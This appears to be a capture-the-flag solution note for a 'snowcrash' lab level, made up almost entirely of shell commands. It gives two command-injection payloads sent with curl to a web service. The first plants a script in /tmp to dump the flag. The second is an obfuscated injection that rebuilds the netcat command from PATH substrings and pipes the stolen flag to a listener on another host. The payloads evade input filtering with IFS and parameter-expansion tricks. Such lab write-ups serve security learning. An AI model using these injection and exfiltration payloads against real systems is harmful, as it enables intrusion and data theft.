>> INTENDED WAY

[snowcrash]
echo -e '#!/bin/bash\ngetflag > /tmp/pasta' > /tmp/xd && chmod 777 /tmp/xd

[host]
./urlencode.sh '*"${IFS}/;DUMMY=2"'
curl 'http://192.168.1.16:4646/?x=%2A%22%24%7BIFS%7D%2F%3BDUMMY%3D2%22'

[snowcrash]
cat /tmp/pasta


>> UNINTENDED WAY
[host]
nc -lnvp 1234

./urlencode.sh '*"$IFS/;T=${PATH#/???/?????/??};N=${T%%:*};S=${PATH#/???/??};C=${S%%??/*};U=${QUERY_STRING#??};GETFLAG=${U%%??=*};${IFS}$GETFLAG${IFS}|$N$C${IFS}192.168.1.5${IFS}1234;$IFSecho$IFS"'

curl 'http://192.168.1.16:4646/?y=getflag&x=%2A%22%24IFS%2F%3BT%3D%24%7BPATH%23%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%2F%3F%3F%7D%3BN%3D%24%7BT%25%25%3A%2A%7D%3BS%3D%24%7BPATH%23%2F%3F%3F%3F%2F%3F%3F%7D%3BC%3D%24%7BS%25%25%3F%3F%2F%2A%7D%3BU%3D%24%7BQUERY_STRING%23%3F%3F%7D%3BGETFLAG%3D%24%7BU%25%25%3F%3F%3D%2A%7D%3B%24%7BIFS%7D%24GETFLAG%24%7BIFS%7D%7C%24N%24C%24%7BIFS%7D192.168.1.5%24%7BIFS%7D1234%3B%24IFSecho%24IFS%22'

CHECK NC LISTENER FOR FLAG
